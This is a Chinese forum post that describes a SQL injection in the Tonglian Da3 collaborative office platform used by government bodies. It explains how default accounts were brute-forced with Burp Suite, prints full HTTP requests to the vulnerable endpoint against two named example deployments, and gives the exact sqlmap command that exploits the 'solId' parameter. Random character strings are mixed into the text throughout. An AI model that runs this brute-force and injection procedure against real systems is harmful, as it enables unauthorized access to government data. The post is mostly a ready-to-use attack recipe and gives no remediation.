找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1459|回复: 0

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
发表于 2018-10-20 20:15:17 | 显示全部楼层 |阅读模式

& i* D! V9 H, R! ^7 [0 n7 x$ g3 T
* q2 k. f6 |; t/ N U. U I5 A* u

1 g% l& [6 l! }+ Z1 d/ ?9 ?3 b3 E

2 w% G2 _# l- U7 T6 g" H 平台简介: " i; `5 J. n& Q. N* O5 P: x, t! t

% m# V* M6 ~5 @: ]2 r. ?) G ]

3 p! a" q l3 I- @0 N  ( u, y- Q) K3 [. \: f0 G# r" x

# e% W U" V6 b5 U8 A- [$ `, x

+ L5 a8 c$ D' d' w! k4 Q1 @$ @+ f 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& Y; t% e& W8 G* }7 B同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 a+ Y5 y/ |' b同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! ( u: p2 I& m" J: e+ i! L

1 T# s# A4 B2 M! A

G. Y5 P/ s! ]1 J% A, w  - m( L* w/ S: H+ m, `

" V: H: }9 U; ?0 c+ r' K6 h

2 ^+ D* x! u1 Y; S: |3 |$ i3 W 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: ; f5 ?" d6 f( U' v, `. o

( I* `0 o: r" b( h5 ?9 ~# A; V `

) K$ Y1 s4 x. L! [7 f, v! B3 ~  . E# w8 H" A; s

4 W- I1 E3 @, `$ N4 H$ L$ _

% F1 Z$ f/ v& N9 {: }: M9 g, V2 s http://1.1.1.1:7197/cap-aco/#(案例2-) ) X4 o' N8 E4 m; u4 Q8 G

6 L" U' H( b4 _1 U+ B' m

8 {" O: }1 m4 L! r$ W" d7 Q; i k http://www.XXOO.com (案例1-官网网站) ' b1 K, {6 F2 P4 ?

' p" L3 K1 ]: s6 T @. `

& Q/ e! n& w2 {8 {1 Z+ k0 ]8 o  2 n% K- b2 ]! w

: R3 N4 Z7 u( p' f

$ b' ?( g$ A2 F4 c' {7 ` 漏洞详情: $ R1 |. h. ^0 t T1 w" L6 z0 a

! X' g1 `0 D% J. ?8 b" `0 {+ H

# X% r( ?, e% z C& Y$ r n  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 v' ]; b9 G5 C7 U- @

) g; ~2 K, P' M- e

: y0 m U4 f9 ~4 j. E9 @3 y      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: 5 x$ D+ a/ j5 D3 H8 a- V

( ?7 z/ r7 m( c' }, y' _' G

- L2 d, {. [0 {" l   / f: k: D4 b: x& t3 @# B

+ v: {3 F. }/ m! H* o+ D8 v

4 X, N. m& D/ u  - S4 {6 q7 V7 a: ?/ ^9 {# } V2 o

7 @ ^% s2 C! V7 Q9 c- Z8 a7 h

+ q0 _) s1 G' c5 b status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: & a- b4 A- D, w- S

. \( M' e$ a, ?! l

) v) ]3 N. w% }5 | 1、案例1-官方网站3 |) G9 ^2 |3 k+ `3 l* X. K# z* ?

- M' y z* S2 K' I. H) R( G( {

! w- O. Z% e8 Z5 l( O8 m GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1. b% j0 I. Q' x% I

9 a8 T. u& j& e. \+ B+ C) t& S

# I* ^6 b2 v+ b8 r6 E, \2 \/ B2 G Host: www.XXOO.com( u# r& Y1 ]' }( _ r8 R1 c2 S

0 Q8 _; p% w& c' Q6 F& G

: b/ P j2 K& d3 R2 y Proxy-Connection: Keep-Alive ) `% R# j- s1 K4 x9 m

* I3 V6 U ^5 F' T- M4 H

) M a, [0 h- I% r0 n. b( }1 L Accept: application/json, text/javascript, */*; q=0.01 % K- r5 H5 o1 D: g# ]+ E4 x

2 V$ A! _* i. `9 x! l: d; E. ^

0 f, u5 I ^- X+ }! x0 F& V8 F* k Accept-Language: zh-CN . `; \8 @# x: R# m

! P; ^2 E$ I4 r# J8 L

. m0 @: t( w* B Content-Type: application/json8 v8 [9 S. B$ J

8 b ^# e7 h# r$ {" m$ c

! g f, H t$ n6 a User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 7 s. Y. g: I! W' E

' \$ g+ M& q) R3 n, _

1 {9 o. w, C7 c5 [0 t- L X-Requested-With: XMLHttpRequest 1 T+ p, e% k1 k; ]) I1 X0 T

) `) ?( Y8 \+ G/ v& M- }# l

& E- q- G, G3 }9 j% l# O+ r. v6 Z Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0027 w7 B: F$ x: E

$ f0 w, |3 i' U9 q/ P

$ [: D- i5 r0 y Accept-Encoding: gzip, deflate, sdch ; D4 }2 I- P. Q) S) E o/ W

! ~! u+ f9 ]; m' d. h5 n/ ]% Q

0 e- c+ }0 ~ f Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e " ?1 S7 W) Z- D! V& s* H

+ g3 l1 P2 K. ~) M7 ~" t

s+ E0 M* A( x4 y% }3 {2 [ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: , |' [9 ]: ^$ U7 J4 X

5 H/ O5 ?; T" G$ e+ Y4 x3 P

+ S! m5 w B1 K# k; x" a8 Q8 d  ; m3 c+ O+ w& w1 G, X

$ N: z8 u) q5 Y. m) U

/ h7 s* y0 M% Y2 L6 C: W/ ?4 t   , H8 L0 \) X; ?# r$ Z4 m0 x

) K5 {* j' ? p* j5 U

6 l( ~, i8 F9 v- b( ^8 D; q w: G   : y3 I" [$ y% b- `3 V

, H2 Z F4 H) _

9 Q7 A o" O# ]6 R. R( L  : y; ?4 E H1 r6 i! M

q: I1 {2 }6 p% B( H& f# a5 R

* e0 X' }4 X0 w$ {7 O4 l* D  * ?; n& \; a# q* m/ K

' D' M8 B+ B, j; l0 j1 a. {

9 `; f$ I0 `% }: ]" B5 E( V+ ^6 L 2、案例2-某天河云平台1 p( |; ], c; Y+ E' g7 V: t

) ? ? j" e( {9 \9 a9 U

5 N7 i: ?# w f3 o GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 ! w5 U( d6 K1 v8 S! L3 g8 Z

1 S ?" @' H9 ]8 i& s: b4 ? R

/ Z9 b1 z% H8 i3 q6 h Host: 1.1.1.:7197+ Y4 F2 d* T9 u3 Z; o# v6 ?& e

* c6 ^/ h j" D& q( H7 N

, h% L; \: I1 ]8 E$ V Accept: application/json, text/javascript, */*; q=0.01 v4 A# I9 C) d$ K" Y% v

( }' `) y6 y4 ^& ~ D1 |# s& |3 F+ h

! f1 i) b" H# d; k) d$ L X-Requested-With: XMLHttpRequest/ ~ Y2 d% e# F6 d1 ~

* `- W" S( x. W, A

7 W, Y* @- w) T/ _: O% b2 N User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.07 @( \; ^/ C- H

! @- R5 b# h: A

/ T/ \ ]5 r/ j8 W! T Content-Type: application/json 6 |; a% E, U1 f

) D# o1 _; {6 d, ~; ]

( a7 R: c! J3 x3 o7 P Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10089 [( E# b) j" ?& k$ r$ \5 B

5 M+ @# G2 E+ Y4 Z' `: z

; T' [! U, \* Z4 G6 c/ e U- p( P* q Accept-Language: zh-CN,zh;q=0.8 ( @0 G" f) A N4 Z1 M' ?9 R

& n% ^/ q" f3 R( J& u. G R5 |

; N8 S$ o, l1 U0 C Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 ( `1 b! v$ O/ u2 @

+ j; I# n. |% o+ B ~' S

+ w" @4 H4 y1 q; D* L8 k3 g Connection: close) f% _8 ^0 n) D' r2 U) m" X

8 ^+ A. m0 w" Y7 r* G

1 M. V! s+ t Z+ [0 q$ @ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: m! f. D5 p# f) z0 T+ k6 @- d; e% D+ J( E

( z2 X% T5 h: W0 w. R

/ k' T; H) o2 S% g& M) O; I   / X3 c) V* N+ x

& r3 S3 }) g: i6 K0 `+ `1 J

& K' ?7 ?9 x4 f" g
5 N" K, z" q$ _* P/ ]- X

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表